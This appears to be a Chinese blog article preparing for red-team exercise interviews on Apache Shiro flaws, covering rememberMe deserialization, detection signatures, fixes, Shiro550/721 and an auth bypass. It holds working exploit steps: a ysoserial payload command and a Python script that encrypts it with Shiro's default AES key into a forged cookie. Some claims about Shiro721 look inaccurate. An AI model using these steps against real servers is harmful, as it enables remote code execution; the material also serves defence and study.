护网中shiro常问的问题
1. 漏洞原理
Apache Shiro 是一个强大的 Java 安全框架,提供身份验证、授权、加密及会话管理功能。Shiro 使用 rememberMe 机制来存储用户会话信息,该机制依赖于加密后的 Cookie。当攻击者能够控制 Cookie 并且服务器使用了不安全的反序列化机制时,就可能造成远程代码执行(RCE)。
Shiro 反序列化漏洞的核心
- Shiro 的
rememberMe功能会在 Cookie 中存储用户的身份信息,该数据通常是通过 AES 加密的。 - 服务器在解析
rememberMeCookie 时,会进行反序列化操作。 - 如果攻击者能够伪造
rememberMeCookie,并利用不安全的 Java 反序列化机制,则可能导致远程代码执行。
Shiro 反序列化漏洞的关键点
-
默认密钥问题(Key Hardcoded) :
- 早期版本(如 Shiro 1.2.4)使用了默认的 AES 密钥
kPH+bIxk5D2deZiIxcaaaA==,攻击者可以利用该密钥解密 Cookie 并伪造恶意数据进行反序列化攻击。
- 早期版本(如 Shiro 1.2.4)使用了默认的 AES 密钥
-
Java 反序列化漏洞:
- Shiro 反序列化时没有严格限制可反序列化的类,导致攻击者可以利用 CommonsCollections、Jdk7u21 等反序列化 gadget 进行 RCE。
2. 漏洞利用
Shiro 反序列化漏洞利用流程
-
获取 Shiro 版本和 AES 密钥
- 通过访问
rememberMeCookie 确认目标是否使用 Shiro。 - 尝试使用 Shiro 默认密钥
kPH+bIxk5D2deZiIxcaaaA==进行解密。 - 如果默认密钥无效,可以利用字典或爆破方式尝试其他密钥。
- 通过访问
-
构造反序列化 payload
-
使用
ysoserial工具生成恶意反序列化数据,如CommonsCollections1:java -jar ysoserial.jar CommonsCollections1 "calc.exe" > payload.bin -
使用 AES 加密该 payload,并 Base64 编码后写入
rememberMeCookie:from Crypto.Cipher import AES import base64key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==") # Shiro 默认密钥 iv = key # Shiro 使用 CBC 模式,IV = keydef pad(s): # PKCS7 补全return s + (16 - len(s) % 16) * chr(16 - len(s) % 16)cipher = AES.new(key, AES.MODE_CBC, iv) encrypted = base64.b64encode(cipher.encrypt(pad(open("payload.bin", "rb").read())))print("rememberMe=" + encrypted.decode())
-
-
发送恶意 Cookie 触发 RCE
-
通过 Burp Suite 或手动修改 Cookie:
rememberMe=恶意Base64编码后的数据 -
访问目标网站,触发 Shiro 反序列化漏洞,执行远程命令。
-
3. 漏洞检测
1. 识别目标是否使用 Shiro
-
观察 HTTP 响应头:
-
Shiro 默认的 session ID 命名规则:
Set-Cookie: JSESSIONID=xxxx; Path=/; HttpOnly Set-Cookie: rememberMe=deleteMe; Path=/; HttpOnly -
rememberMe=deleteMe可能表明目标使用 Shiro。
-
-
访问
/favicon.ico,如果返回 Shiro 默认的favicon.ico,说明目标可能使用 Shiro:curl -I http://target.com/favicon.ico
2. 检测是否存在 Shiro 反序列化漏洞
- 发送
rememberMe=deleteMe观察是否被 Shiro 自动删除。 - 使用已知 AES 密钥加密测试 payload,观察目标是否执行恶意代码。
流量特征
-
在请求包的Cookie中为?remeberMe字段赋任意值
-
返回包中存在set-Cookie:remeberMe=deleteMe
-
URL中有shiro字样
-
有时候服务器不会主动返回remeberMe=deleteMe,直接发包即可
-
remenber me处含有大量的base字符或者是aes加密后的字符,并且返回包200状态码的,很有可能是被内存马注入或者在进行利用链爆破
-
攻击者成功webshell后,返回数据包的回显会会有
$$$base64编码$$$字符
4. 修复方案
1. 升级 Shiro 版本
-
Shiro 1.2.5 及以上版本修复了默认密钥问题,建议升级到最新版本:
<dependency><groupId>org.apache.shiro</groupId><artifactId>shiro-core</artifactId><version>1.12.0</version> </dependency>
2. 修改 AES 密钥
-
避免使用 Shiro 默认密钥,修改
shiro.ini或shiro-config.properties:shiro.crypto.key=<随机生成的 Base64 AES 密钥>
3. 使用更安全的序列化机制
-
使用
SimpleSession代替 Java 反序列化:session.setAttribute("rememberMe", YOUR_SECURE_SERIALIZATION_METHOD); -
采用 Kryo、JSON 等安全的序列化方式,避免 Java 反序列化漏洞。
4. 过滤危险类
-
采用 Java
ObjectInputFilter机制:ObjectInputFilter filter = ObjectInputFilter.Config.createFilter("!*;java.util.**;org.apache.shiro.**");
漏洞类型
-
linux出网环境
-
访问网址发现url存在shiro字眼,可以确认是shiro环境
-
通过修改cookie字段的信息,返回包那里含有rememberMe=deleteMe字段,说明存在shiro漏洞,直接上工具即可
-
-
linux不出网环境
- 不出网我们可以采用延迟来判断漏洞是否存在
- 通过脚本会尝试发送不同的密钥(Key)和利用链(Gadget),并观察服务器的响应时间。
- 如果服务器的响应时间比正常情况延迟了5秒,则说明该
key + gadget组合有效,Shiro 存在反序列化漏洞。 - 如果某个key和gadget组合以及延时命令success生效了,就是存在的,还区分两个判断windows和linux,最后在写入shell后还对发送命令进行了base64编码后发送
-
apache shiro 权限绕过
-
漏洞的根本原因
- shiro的URL拦截器中的路径匹配规则的存在设计缺陷
- spring MVC处理URL时,会将
/hello和/hello/视为相同的资源
-
漏洞复现
- 不可以访问
/admin,但是可以访问/admin/ - 说明存在权限绕过,可以通过
/路径/的形式访问未授权资源
- 不可以访问
-
-
shiro550漏洞
-
原理
- apache shiro框架提供了记住密码的功能,用户登录成功后会生成经过aes加密并base64编码的cookie,在服务端会对rememberme的cookie的值,先base64解码然后aes解密在反序列化,因为aes的秘钥是写死在代码里面,所以导致了反序列化rce漏洞产生
-
攻击流程
- 通过勾选登录页面的“记住我”选项并进行登录,抓包观察请求和响应中的
rememberMe字段。 - 使用shiro_attack-2.2.jar工具或python脚本(shiro_exploit.py)进行密钥检测和爆破,确认是否能获取到固定的密钥kPH+bIxk5D2deZiIxcaaaA==。
- 通过勾选登录页面的“记住我”选项并进行登录,抓包观察请求和响应中的
-
-
shiro 721漏洞
-
原理
- Shiro721与shiro550不同,他的AES加密的key基本猜不到,系统随机生成。可使用登录后的RememberMe来爆破正确的key值,就是利用对加密消息填充错误的反馈,来逐步判断加密数据的内容,就是利用Shiro Cookie签名校验逻辑缺陷,然后构造RememberMe Cookie值来实现反序列化漏洞攻击
-
shrio550和721的区别
主要区别在于Shiro550使用已知默认密码,只要有足够的密码,不需要Remember Cookie的
Shiro721的ase加密的key为系统随机生成,需要利用登录后的rememberMe去爆破正确的key值。利用有效的RememberMe Cookie作为Padding Oracle Attack的前缀,再去构造反序列化攻击。
-
Shiro550和Shiro721的主要区别在于:
- Shiro550利用已知密钥碰撞,Shiro721需要通过有效的RememberMe Cookie来爆破正确的key。
- Shiro550利用CommonsCollections链,Shiro721利用Fastjson链。
- Shiro550是Shiro rememberMe功能设计缺陷,Shiro721是Shiro Cookie签名校验逻辑缺陷。
- Shiro721利用更简单,只需修改Cookie签名即可getshell。
相关文章:
护网中shiro常问的问题
1. 漏洞原理 Apache Shiro 是一个强大的 Java 安全框架,提供身份验证、授权、加密及会话管理功能。Shiro 使用 rememberMe 机制来存储用户会话信息,该机制依赖于加密后的 Cookie。当攻击者能够控制 Cookie 并且服务器使用了不安全的反序列化机制时&…...
fastapi房产销售系统
说明: 我希望用fastapi写几个接口,查询房产交易系统的几条数据,然后在postman里面测试 查询客户所有预约记录(含房源信息)需要对应销售经理查询客户所有订单(含房源信息)统计销售经理名下所有房…...
swift -(5) 汇编分析结构体、类的内存布局
一、结构体 在 Swift 标准库中,绝大多数的公开类型都是结构体,而枚举和类只占很小一部分 比如Bool、 Int、 Double、 String、 Array、 Dictionary等常见类型都是结构体 ① struct Date { ② var year: Int ③ var month: Int ④ …...
软件工程笔记下
从程序到软件☆ 章节 知识点 概论☆ 软件的定义,特点,生存周期。软件工程的概论。软件危机。 1.☆软件:软件程序数据文档 (1)软件:是指在计算机系统的支持下,能够完成特定功能与性能的包括…...
ElementUI 级联选择器el-cascader启用选择任意一级选项,选中后关闭下拉框
1、启用选择任意一级选项 在 el-cascader 标签上加上配置项: :props"{ checkStrictly: true }"例如: <el-cascaderref"selectedArrRef"v-model"selectedArr":options"optionsList":props"{ checkStri…...
【项目日记(九)】细节优化与对比测试
前言 上面我们对申请和释放的过程都已写完,并进行了单线程的联调。本期我们来对一些细节进行优化以及与malloc 进行对比测试。 目录 前言 一、大于256KB的内存申请问题 • 申请过程 • 释放过程 • 简单测试 二、使用定长内存池脱离使用new 三、优化释放对…...
PyTorch系列教程:编写高效模型训练流程
当使用PyTorch开发机器学习模型时,建立一个有效的训练循环是至关重要的。这个过程包括组织和执行对数据、参数和计算资源的操作序列。让我们深入了解关键组件,并演示如何构建一个精细的训练循环流程,有效地处理数据处理,向前和向后…...
10 【HarmonyOS NEXT】 仿uv-ui组件开发之Avatar头像组件开发教程(一)
温馨提示:本篇博客的详细代码已发布到 git : https://gitcode.com/nutpi/HarmonyosNext 可以下载运行哦! 目录 第一篇:Avatar 组件基础概念与设计1. 组件概述2. 接口设计2.1 形状类型定义2.2 尺寸类型定义2.3 组件属性接口 3. 设计原则4. 使用…...
C++编程指南24 - 避免线程频繁的创建和销毁
一:概述 线程的创建和销毁是昂贵的操作,尤其在多线程程序中频繁创建和销毁线程时,可能会导致性能问题。 二:示例 这段代码中,dispatcher 每收到一个 Message 就创建一个新的线程来处理这个消息。这种方式虽然简单&…...
C语言——【全局变量和局部变量】
🚀个人主页:fasdfdaslsfadasdadf 📖收入专栏:C语言 🌍文章目入 1.🚀 全局变量2.🚀 局部变量3.🚀 局部和全局变量,名字相同呢? 1.🚀 全局变量 全局变量&…...
浅谈 DeepSeek 对 DBA 的影响
引言: 在人工智能技术飞速发展的背景下,DeepSeek 作为一款基于混合专家模型(MoE)和强化学习技术的大语言模型,正在重塑传统数据库管理(DBA)的工作模式。通过结合其强大的自然语言处理能力、推理…...
Web服务器配置
配置虚拟主机:启动XAMPP的Apache,在htdocs目录中创建www.php.test目录 创建index.html,内容为“Welcome www.php.test”,访问两个虚拟主机 访问权限控制 在Apache的主配置文件httpd.conf中,默认已经添加了一些目录的…...
DeepSeek-R1本地化部署(Mac)
一、下载 Ollama 本地化部署需要用到 Ollama,它能支持很多大模型。官方网站:https://ollama.com/ 点击 Download 即可,支持macOS,Linux 和 Windows;我下载的是 mac 版本,要求macOS 11 Big Sur or later,Ol…...
Java面试第九山!《SpringBoot框架》
引言 你是否经历过这样的场景?想快速开发一个Java Web应用,却被XML配置、依赖冲突、服务器部署搞得焦头烂额。Spring Boot的诞生,正是为了解决这些"配置地狱"问题。 对比项Spring Boot传统 Spring配置复杂度自动配置,…...
Java 中数据脱敏的实现
数据脱敏 首先,要思考一个问题,SpringBoot 查询到的一条数据是一个 Java 对象,为什么返回给前端时候,前端拿到的却是 JSON 格式的数据呢? 是因为 SpringBoot 默认采用了 Jackson 作为序列化器,而 Jackson…...
PyQt组件间的通信方式
PyQt组件间的通信方式 PyQt组件间的通信方式 1. 组件介绍 1.1 组件的定义1.2 组件的分类 2. 组件的通信方式 2.1 信号与槽(Signal & Slot) 1. 组件介绍 在 Qt 框架中,组件(Component)是构建图形用户界面&am…...
视频理解开山之作 “双流网络”
1 论文核心信息 1.1核心问题 任务:如何利用深度学习方法进行视频中的动作识别(Action Recognition)。挑战: 视频包含时空信息,既需要捕捉静态外观特征(Spatial Information),也需要…...
基于Matlab的人脸识别的二维PCA
一、基本原理 传统 PCA 在处理图像数据时,需将二维图像矩阵拉伸为一维向量,这使得数据维度剧增,引发高计算成本与存储压力。与之不同,2DPCA 直接基于二维图像矩阵展开运算。 它着眼于图像矩阵的列向量,构建协方差矩阵…...
Java直通车系列15【Spring MVC】(ModelAndView 使用)
目录 1. ModelAndView 概述 2. ModelAndView 的主要属性和方法 主要属性 主要方法 3. 场景示例 示例 1:简单的 ModelAndView 使用 示例 2:使用 ModelAndView 处理列表数据 示例 3:使用 ModelAndView 处理异常情况 1. ModelAndView 概…...
考研数一非数竞赛复习之Stolz定理求解数列极限
在非数类大学生数学竞赛中,Stolz定理作为一种强大的工具,经常被用来解决和式数列极限的问题,也被誉为离散版的’洛必达’方法,它提供了一种简洁而有效的方法,使得原本复杂繁琐的极限计算过程变得直观明了。本文&#x…...
Java在小米SU7 Ultra汽车中的技术赋能
目录 一、智能驾驶“大脑”与实时数据 场景一:海量数据的分布式计算 场景二:实时决策的毫秒级响应 场景三:弹性扩展与容错机制 技术隐喻: 二、车载信息系统(IVI)的交互 场景一:Android Automo…...
【简单的C++围棋游戏开发示例】
C围棋游戏开发简单示例(控制台版) 核心代码实现 #include <iostream> #include <vector> #include <queue> using namespace std;const int SIZE 9; // 简化棋盘为9x9:ml-citation{ref"1" data"citationList&…...
DeepSeek R1-7B 医疗大模型微调实战全流程分析(全码版)
DeepSeek R1-7B 医疗大模型微调实战全流程指南 目录 环境配置与硬件优化医疗数据工程微调策略详解训练监控与评估模型部署与安全持续优化与迭代多模态扩展伦理与合规体系故障排除与调试行业应用案例进阶调优技巧版本管理与迭代法律风险规避成本控制方案文档与知识传承1. 环境配…...
HCIA-DHCP
1、定义:DHCP即动态主机配置协议,通过C/S模型架构,无需主机配置IP地址,自动分配网络配置参数的网络协议。 2、作用 对比项目无 DHCP有 DHCP配置难度配置多,容易出错自动为客户端分配 IP 地址及其他网络配置参数&…...
前端面试题 口语化复述解答(从2025.3.8 开始频繁更新中)
背景 看了很多面试题及其答案。但是过于标准化,一般不能直接用于回复面试官,这里我将总结一系列面试题,用于自我复习也乐于分享给大家,欢迎大家提供建议,我必不断完善之。 Javascript ES6 1. var let const 的区别…...
网络安全技术和协议(高软43)
系列文章目录 网络安全技术和协议 文章目录 系列文章目录前言一、网络安全技术1.防火墙2.入侵检测系统IDS3.入侵防御系统IPS 二、网络攻击和威胁三、网络安全协议四、真题在这里插入图片描述 总结 前言 本节讲明网络安全技术和协议方面的相关知识。 一、网络安全技术 1.防火…...
K8S学习之基础十七:k8s的蓝绿部署
蓝绿部署概述 蓝绿部署中,一共有两套系统,一套是正在提供服务的系统,一套是准备发布的系统。两套系统都是功能完善、正在运行的系统,只是版本和对外服务情况不同。 开发新版本,要用新版本替换线上的旧版本&…...
【统计至简】【古典概率模型】联合概率、边缘概率、条件概率、全概率
联合概率、边缘概率、条件概率 联合概率边缘概率条件概率全概率 一副标准扑克牌有 54 张,包括 52 张常规牌(13 个点数,每个点数有 4 种花色)和 2 张王(大、小王)。我们从中随机抽取一张牌,定义以…...
批量插入对比-mysql-oracle-sqlserver
单个插入mysql //单个 根据有值就插入,无值不改动 <insert id"insertOne" keyColumn"id" keyProperty"id"parameterType"com.test.log" useGeneratedKeys"true">insert into test_mysql_tab<trim p…...
saltstack通过master下发脚本批量修改minion_id,修改为IP
通过master下发脚本批量修改minion_id,以修改为IP为例 通过cmd.script远程执行shell脚本修改minion_id,步骤如下: # 下发脚本并执行 >> salt old_minion_id cmd.script salt://modify_minion_id.sh saltenvdev #输出结果 old_minion_id:Minion di…...



